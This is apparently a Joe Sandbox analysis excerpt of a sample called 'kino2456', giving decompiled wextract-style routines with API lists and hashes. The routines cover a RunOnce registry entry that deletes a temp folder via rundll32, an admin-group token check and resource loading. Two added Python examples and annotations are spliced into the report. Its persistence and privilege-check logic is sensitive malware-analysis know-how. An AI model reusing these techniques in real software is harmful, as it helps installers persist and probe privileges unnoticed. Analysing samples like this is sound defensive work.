• CharUpperA.USER32(F4CC89A0,00000000,00000000,00000000), ref: 009627A8
• CharNextA.USER32(0000054D), ref: 009627B5
• CharNextA.USER32(00000000), ref: 009627BC
• RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00962829
• RegQueryValueExA.ADVAPI32(?,00961140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00962852
• ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00962870
• RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 009628A0
• GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 009628AA
• GetSystemDirectoryA.KERNEL32 ref: 009628B9
Strings
• Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 009627E4
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
• String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
• API String ID: 2659952014-2428544900
• Opcode ID: 98087d8d9d74082b0d3dca042cea967427bb4909a598e9ab255cf79fc23567c4
• Instruction ID: a9821aee4ff85874e9d462c6dee93e35e392d1aaa7a77ab62be58233ad209b4f
• Opcode Fuzzy Hash: 98087d8d9d74082b0d3dca042cea967427bb4909a598e9ab255cf79fc23567c4
• Instruction Fuzzy Hash: E641B571E0812CAFDB249B64DC85AEA7BBDEF56700F0440A9F645E3100DBB48E859FA1
Uniqueness
Uniqueness Score: -1.00%

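The branch logic of the fragment above, written out as an added example (it is not part of the Joe Sandbox report and not code from the analysed sample): a Python model of the App Paths lookup in which the registry and the environment are supplied as constructed dictionaries, so it runs offline and the failure paths can be exercised. The value-type constants (1 = REG_SZ, 2 = REG_EXPAND_SZ), the 0x104 buffer size and the HKLM App Paths key come from the decompilation and the API list; the `registry` dict layout, the stand-in for ExpandEnvironmentStringsA, the branch names, the sample entries and the reading of E00961680 as a bounded copy back into the caller's buffer are assumptions made for this example. The GetWindowsDirectoryA / GetSystemDirectoryA calls listed for this function are not modelled, because the conditions that reach them are outside the fragment.

```python
import re

# The literals compared in the decompilation (`_t45 != 2`, `_t45 == 1`) are
# registry value types as returned by RegQueryValueExA.
REG_SZ = 1
REG_EXPAND_SZ = 2
APP_PATHS = r"Software\Microsoft\Windows\CurrentVersion\App Paths"
MAX_PATH = 0x104          # size passed to ExpandEnvironmentStringsA and E00961680


def expand_environment_strings(text, env):
    """Stand-in for ExpandEnvironmentStringsA (assumption: not the real API).

    %NAME% is replaced from `env` (names are case-insensitive, as on Windows);
    unknown names are left untouched, which is what the real API does.
    Returns (chars_needed, expanded): chars_needed includes the terminator, so
    it is never 0 on success. The decompiled caller tests only for 0 and never
    compares the count against its 0x104-byte buffer.
    """
    expanded = re.sub(r"%([^%]+)%",
                      lambda m: env.get(m.group(1).upper(), m.group(0)),
                      text)
    return len(expanded) + 1, expanded


def resolve_app_path(exe_name, registry, env, expand=expand_environment_strings):
    """Model of the branches visible in the fragment.

    `registry` is a constructed dict "HKLM\\<subkey>" -> (value_type, data)
    standing in for RegOpenKeyExA + RegQueryValueExA; it is not a live
    registry. `expand` is injectable so the ExpandEnvironmentStringsA == 0
    path can be exercised. Returns (path or None, name of the branch taken).
    """
    entry = registry.get("HKLM\\%s\\%s" % (APP_PATHS, exe_name))
    if entry is None:
        # RegOpenKeyExA / RegQueryValueExA failed: _t50 stays 0, control goes to L16
        return None, "not_resolved"
    value_type, data = entry
    if value_type == REG_EXPAND_SZ:
        chars_needed, expanded = expand(data, env)
        if chars_needed != 0:
            # E00961680(_t61, 0x104, &_v268): assumed to copy the expanded
            # string back into the caller's buffer, bounded at 0x104 bytes.
            return expanded[:MAX_PATH - 1], "app_paths_expand_sz"
        # Expansion failed: the code reloads the type and re-tests `== 1`,
        # which cannot hold for a REG_EXPAND_SZ value, so the lookup fails.
        return None, "not_resolved"
    if value_type == REG_SZ:
        return data, "app_paths_sz"
    # Any other value type (REG_BINARY, REG_DWORD, ...) leaves _t50 == 0.
    return None, "not_resolved"


# Constructed sample registry content for the example (not taken from the sample).
SAMPLE_REGISTRY = {
    "HKLM\\" + APP_PATHS + "\\chrome.exe":
        (REG_SZ, r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    "HKLM\\" + APP_PATHS + "\\notepad++.exe":
        (REG_EXPAND_SZ, r"%ProgramFiles%\Notepad++\notepad++.exe"),
    "HKLM\\" + APP_PATHS + "\\broken.exe":
        (3, b"\x01\x02"),                       # REG_BINARY: rejected by the type checks
}
SAMPLE_ENV = {"PROGRAMFILES": r"C:\Program Files"}

if __name__ == "__main__":
    for name in ("chrome.exe", "notepad++.exe", "broken.exe", "missing.exe"):
        print(name, "->", resolve_app_path(name, SAMPLE_REGISTRY, SAMPLE_ENV))
```

Two points the model makes visible: the REG_EXPAND_SZ branch hands the routine whatever %VAR% references the App Paths value contains, so the resolved path depends on the process environment as well as on the registry, and the only check on ExpandEnvironmentStringsA is `== 0`, so an expansion longer than the 0x104-byte buffer is not detected at this point; what E00961680 does with such a string is not visible in the fragment.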
C-Code - Quality: 62%
			E00962267() {
				signed int _v8;
				char _v268;
				char _v836;
				void* _v840;
				int _v844;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				intOrPtr _t33;
				void* _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t47;
				void* _t49;
                                                                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t19 =  *0x968004; // 0xf4cc89a0
                                                                                                                                                                                                                                    				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                    				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                    				if( *0x968530 != 0) {
                                                                                                                                                                                                                                    					_push(_t49);
                                                                                                                                                                                                                                    					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                    						_push(_t38);
                                                                                                                                                                                                                                    						_v844 = 0x238;
                                                                                                                                                                                                                                    						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                    							_push(_t47);
                                                                                                                                                                                                                                    							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                    							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                    								E0096658A( &_v268, 0x104, 0x961140);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                    							E0096171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                    							_t42 =  &_v836;
                                                                                                                                                                                                                                    							_t45 = _t42 + 1;
                                                                                                                                                                                                                                    							_pop(_t47);
                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                    								_t33 =  *_t42;
                                                                                                                                                                                                                                    								_t42 = _t42 + 1;
                                                                                                                                                                                                                                    							} while (_t33 != 0);
                                                                                                                                                                                                                                    							RegSetValueExA(_v840, "wextract_cleanup2", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                    						_pop(_t38);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_pop(_t49);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00966CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                    			}




















APIs
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 009622A3
• RegQueryValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000000,?,?,00000001), ref: 009622D8
• memset.MSVCRT ref: 009622F5
• GetSystemDirectoryA.KERNEL32 ref: 00962305
• RegSetValueExA.ADVAPI32(?,wextract_cleanup2,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 0096236E
• RegCloseKey.ADVAPI32(?), ref: 0096237A
Strings
• wextract_cleanup2, xrefs: 0096227C, 009622CD, 00962363
• Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00962299
• rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 0096232D
• C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00962321
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Value$CloseDirectoryOpenQuerySystemmemset
• String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup2
• API String ID: 3027380567-2274915764
• Opcode ID: 32e5976c47bc9fdc1944079fb2750f1ed20965996dfcef3c9974056097601581
• Instruction ID: e0fb3b891d75098fbaa525c32b611f0718de2aea0d1d8de15ef73793c4a75305
• Opcode Fuzzy Hash: 32e5976c47bc9fdc1944079fb2750f1ed20965996dfcef3c9974056097601581
• Instruction Fuzzy Hash: F231E371A04218ABCB219B60DC49FEBBB7CEB55744F0401E9F50DA6040EB75AF88CE50
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 87%
E00963100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
	void* _t8;
	void* _t11;
	void* _t15;
	struct HWND__* _t16;
	struct HWND__* _t33;
	struct HWND__* _t34;

	_t8 = _a8 - 0xf;
	if(_t8 == 0) {
		if( *0x968590 == 0) {
			SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
			 *0x968590 = 1;
		}
		L13:
		return 0;
	}
	_t11 = _t8 - 1;
	if(_t11 == 0) {
		L7:
		_push(0);
		L8:
		EndDialog(_a4, ??);
		L9:
		return 1;
	}
	_t15 = _t11 - 0x100;
                                                                                                                                                                                                                                    				if(_t15 == 0) {
                                                                                                                                                                                                                                    					_t16 = GetDesktopWindow();
                                                                                                                                                                                                                                    					_t33 = _a4;
                                                                                                                                                                                                                                    					E009643D0(_t33, _t16);
                                                                                                                                                                                                                                    					SetDlgItemTextA(_t33, 0x834,  *0x968d4c);
                                                                                                                                                                                                                                    					SetWindowTextA(_t33, "doza2");
                                                                                                                                                                                                                                    					SetForegroundWindow(_t33);
                                                                                                                                                                                                                                    					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                                                    					 *0x9688b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                                                    					SetWindowLongA(_t34, 0xfffffffc, E009630C0);
                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t15 != 1) {
                                                                                                                                                                                                                                    					goto L13;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_a12 != 6) {
                                                                                                                                                                                                                                    					if(_a12 != 7) {
                                                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L7;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                                                    				goto L8;
                                                                                                                                                                                                                                    			}
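
The dialog procedure above shows a pattern that is easy to misread in decompiler output: a `switch (msg)` lowered into a chain of subtractions (`_t8 = msg - base`, `_t11 = _t8 - 1`, `_t15 = _t11 - 0x100`) where the initial `base` is never displayed. The following is an added example, not code from the Joe Sandbox report or from the analysed sample, that recovers the absolute case values from the visible deltas once one case is anchored by its body (here the `_t15 == 0` branch, whose SetWindowText/SetDlgItemText/subclassing is the classic WM_INITDIALOG handler). The names `resolve_switch`, `WM_NAMES`, `DLG_IDS` and `DOZA2_CHAIN` are this example's own; the chain constants are copied from the listing.

```python
"""Recover absolute switch-case values from a decompiler's subtraction chain.

Added example; not part of the sandbox report or the sample. The chain below is
transcribed from the decompiled dialog procedure, everything else is assumed.
"""

# Windows message and dialog-button constants (winuser.h); only the ones needed here.
WM_NAMES = {
    0x000F: "WM_PAINT",
    0x0010: "WM_CLOSE",
    0x0110: "WM_INITDIALOG",
    0x0111: "WM_COMMAND",
}
DLG_IDS = {1: "IDOK", 2: "IDCANCEL", 6: "IDYES", 7: "IDNO"}


def resolve_switch(steps, anchor, anchor_value):
    """Resolve the absolute value tested by every comparison in a subtraction chain.

    steps: list of (delta, compares). Step i computes t_i = t_(i-1) - delta and then
           tests `if (t_i == c)` for each c in compares. The decompiler hides the
           first delta (msg - base), so pass 0 for step 0 and let the anchor fix it.
    anchor: (step_index, compare_value) whose meaning is known from its handler body.
    anchor_value: the real message number of that anchor case.
    Returns {(step_index, compare_value): absolute_value}.
    """
    offsets = {}
    running = 0
    for i, (delta, compares) in enumerate(steps):
        running += delta
        for c in compares:
            offsets[(i, c)] = running + c
    base = anchor_value - offsets[anchor]
    return {key: base + off for key, off in offsets.items()}


def name_messages(resolved):
    """Map resolved values to WM_ names. Unknown values come back as '0x....?' so a
    wrong anchor hypothesis shows up as unnamed cases instead of silently passing."""
    return {key: WM_NAMES.get(v, f"0x{v:04X}?") for key, v in resolved.items()}


# Chain exactly as it appears in the decompiled procedure:
#   _t8  = msg - ?;        if (_t8 == 0)
#   _t11 = _t8 - 1;        if (_t11 == 0)
#   _t15 = _t11 - 0x100;   if (_t15 == 0) ...   if (_t15 == 1)
DOZA2_CHAIN = [(0, [0]), (1, [0]), (0x100, [0, 1])]


def decode_doza2_dialog_proc():
    """Anchor the _t15 == 0 case to WM_INITDIALOG and resolve the rest of the chain."""
    return resolve_switch(DOZA2_CHAIN, anchor=(2, 0), anchor_value=0x110)


def decode_command_ids(wparams):
    """Name the wParam values tested in the WM_COMMAND branch (6 and 7 in the listing)."""
    return [DLG_IDS.get(w, f"{w}?") for w in wparams]


if __name__ == "__main__":
    resolved = decode_doza2_dialog_proc()
    for key, name in name_messages(resolved).items():
        print(f"step {key[0]}, == {key[1]}: 0x{resolved[key]:04X} {name}")
    print(decode_command_ids([6, 7]))
```

With the WM_INITDIALOG anchor every case resolves to a named message (0xF WM_PAINT, 0x10 WM_CLOSE, 0x110 WM_INITDIALOG, 0x111 WM_COMMAND), which is the consistency check worth running before writing up a decompiled handler: a wrong anchor leaves stray unnamed values.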

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 0096313B
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 0096314B
                                                                                                                                                                                                                                    • SetDlgItemTextA.USER32(?,00000834), ref: 0096316A
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 00963176
                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(?), ref: 0096317D
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000834), ref: 00963185
                                                                                                                                                                                                                                    • GetWindowLongA.USER32(00000000,000000FC), ref: 00963190
                                                                                                                                                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,009630C0), ref: 009631A3
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 009631CA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 3785188418-612509477
                                                                                                                                                                                                                                    • Opcode ID: d82ccc8ecb8d3accf1745a45a10b0693405dd30b71c7894c925b46cc795d53cb
                                                                                                                                                                                                                                    • Instruction ID: 233094fa93b1b6ebc9954c279415c42847acecaabc6a7cf86e6bacc0813efafe
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d82ccc8ecb8d3accf1745a45a10b0693405dd30b71c7894c925b46cc795d53cb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7011033125C211BBDB105F249C0CB5A3A68FB4B720F128619F922E11E0DBF49A41EB42
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 91%
			E009618A3(void* __edx, void* __esi) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				char _v20;
				long _v24;
				void* _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				signed int _t23;
				long _t45;
				void* _t49;
				int _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t49 = __edx;
				_t23 =  *0x968004; // 0xf4cc89a0 -- the module's stack-protector cookie
				_v8 = _t23 ^ _t53; // canary = cookie ^ frame pointer; E00966CE0 re-checks it on return
				_t25 =  *0x968128; // 0x2 -- global flag; the routine does nothing unless it equals 2
				_t45 = 0;
				/* _v20 (ebp-20), _v16 (6-byte authority at ebp-16..ebp-11) and _v12 (short at ebp-12..ebp-11)
				   overlap on the stack, so _v16.Value = 0 followed by _v12 = 0x500 leaves the authority
				   bytes as 00 00 00 00 00 05, i.e. SECURITY_NT_AUTHORITY, the usual prelude to building an
				   NT SID for a token-membership check. The remainder of the routine is not in this section. */
				_v12 = 0x500;
				_t50 = 2;
				_v16.Value = 0;
				_v20 = 0;
				if(_t25 != _t50) {
					L20:
					return E00966CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(E009617EE( &_v20) != 0) {
                                                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                                                    					if(_v20 != 0) {
                                                                                                                                                                                                                                    						 *0x968128 = 1;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                    					L17:
                                                                                                                                                                                                                                    					CloseHandle(_v28);
                                                                                                                                                                                                                                    					_t25 = _v20;
                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_push(__esi);
                                                                                                                                                                                                                                    					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                    					if(_t52 == 0) {
                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                    						_pop(_t51);
                                                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                                    						LocalFree(_t52);
                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if( *_t52 <= 0) {
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							FreeSid(_v32);
                                                                                                                                                                                                                                    							goto L15;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                    						_t50 = _t15;
                                                                                                                                                                                                                                    						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                    							_t45 = _t45 + 1;
                                                                                                                                                                                                                                    							_t50 = _t50 + 8;
                                                                                                                                                                                                                                    							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *0x968128 = 1;
                                                                                                                                                                                                                                    						_v20 = 1;
                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}

APIs
  • Part of subcall function 009617EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009618DD), ref: 0096181A
  • Part of subcall function 009617EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0096182C
  • Part of subcall function 009617EE: AllocateAndInitializeSid.ADVAPI32(009618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,009618DD), ref: 00961855
  • Part of subcall function 009617EE: FreeSid.ADVAPI32(?,?,?,?,009618DD), ref: 00961883
  • Part of subcall function 009617EE: FreeLibrary.KERNEL32(00000000,?,?,?,009618DD), ref: 0096188A
• GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 009618EB
• OpenProcessToken.ADVAPI32(00000000), ref: 009618F2
• GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 0096190A
• GetLastError.KERNEL32 ref: 00961918
• LocalAlloc.KERNEL32(00000000,?,?), ref: 0096192C
• GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00961944
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00961964
• EqualSid.ADVAPI32(00000004,?), ref: 0096197A
• FreeSid.ADVAPI32(?), ref: 0096199C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 009619A3
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 009619AD
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
• String ID:
• API String ID: 2168512254-0
• Opcode ID: 85dd7def214a64c4d9018fedf7b99e42d5257ec12e64fe40a0ae2c9891ba5014
• Instruction ID: e955cf167be642a92cefc83ee01479df31dd41928d06668b6c90d227c1416cb4
• Opcode Fuzzy Hash: 85dd7def214a64c4d9018fedf7b99e42d5257ec12e64fe40a0ae2c9891ba5014
• Instruction Fuzzy Hash: 84316D71A14209AFDB20DFA5EC98ABFBBBCFF05344F140429E645E2160DB709945EF61
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 82%
E0096468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
	long _t4;
	void* _t11;
	CHAR* _t14;
	void* _t15;
	long _t16;

	_t14 = __ecx;
	_t11 = __edx;
	_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
	_t16 = _t4;
	if(_t16 <= _a4 && _t11 != 0) {
		if(_t16 == 0) {
			L5:
			return 0;
		}
		_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
		if(_t15 == 0) {
			goto L5;
		}
		__imp__memcpy_s(_t11, _a4, _t15, _t16);
		FreeResource(_t15);
		return _t16;
	}
	return _t4;
}

Instruction addresses:
0x00964699
0x0096469b
0x009646a9
0x009646af
0x009646b4
0x009646bc
0x009646f9
0x00000000
0x009646f9
0x009646d9
0x009646dd
0x00000000
0x00000000
0x009646e5
0x009646ef
0x00000000
0x009646f5
0x009646ff

APIs
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
• SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
• FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
• LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
• LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
• memcpy_s.MSVCRT ref: 009646E5
• FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
• String ID: TITLE$doza2
• API String ID: 3370778649-4167907646
• Opcode ID: aa0a8ba0f01111c228bee3fd4eddce0964d134a6bdf254b0a8ca6823737d9160
• Instruction ID: ea3a0a5063552112b2598708d1ce3adf3eb57c540c1c3166435507c5f0e3208e
• Opcode Fuzzy Hash: aa0a8ba0f01111c228bee3fd4eddce0964d134a6bdf254b0a8ca6823737d9160
• Instruction Fuzzy Hash: 8601A93624C2107BE3501BE59C4DF6B7E2DEBC7F51F050018FA49A7150C9F18C419AB6
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 57%
E009617EE(intOrPtr* __ecx) {
	signed int _v8;
	short _v12;
	struct _SID_IDENTIFIER_AUTHORITY _v16;
	_Unknown_base(*)()* _v20;
	void* _v24;
	intOrPtr* _v28;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t14;
	_Unknown_base(*)()* _t20;
	long _t28;
	void* _t35;
	struct HINSTANCE__* _t36;
	signed int _t38;
	intOrPtr* _t39;

	_t14 =  *0x968004; // 0xf4cc89a0
	_v8 = _t14 ^ _t38;
	_v12 = 0x500;
	_t37 = __ecx;
	_v16.Value = 0;
	_v28 = __ecx;
	_t28 = 0;
	_t36 = LoadLibraryA("advapi32.dll");
	if(_t36 != 0) {
		_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                    					_v20 = _t20;
                                                                                                                                                                                                                                    					if(_t20 != 0) {
                                                                                                                                                                                                                                    						 *_t37 = 0;
                                                                                                                                                                                                                                    						_t28 = 1;
                                                                                                                                                                                                                                    						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                    							_t37 = _t39;
                                                                                                                                                                                                                                    							 *0x96a288(0, _v24, _v28);
                                                                                                                                                                                                                                    							_v20();
                                                                                                                                                                                                                                    							if(_t39 != _t39) {
                                                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							FreeSid(_v24);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					FreeLibrary(_t36);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return E00966CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                    			}

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,009618DD), ref: 0096181A
